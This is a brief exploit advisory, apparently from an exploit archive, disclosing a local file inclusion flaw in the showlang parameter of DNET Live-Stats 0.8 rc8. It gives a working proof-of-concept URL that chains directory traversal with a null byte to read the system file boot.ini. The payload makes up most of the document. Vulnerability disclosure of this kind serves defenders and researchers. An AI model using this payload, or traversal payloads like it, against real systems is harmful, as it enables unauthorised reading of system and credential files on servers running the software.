id: 14358
date: 10/05/2010
title: DNET Live-Stats LFI Vulnerability
author: Blake
cves: 

=================================
DNET Live-Stats LFI Vulnerability
=================================

# Date: 10-04-10
# Author: Blake
# Software Link: http://sourceforge.net/projects/dnetlivestats/files/0.8/dnet-live-stats-0.8-rc8.zip/download
# Version: 0.8 rc8
# Tested on: Windows XP SP3 running xampp lite
 
The showlang parameter does not properly sanitize user input.
 
POC:
http://127.0.0.1/dnet/team.rc5-72.php?showlang=../../../../../../../../../../../../boot.ini%00



#  0day.today [2023-03-26]  #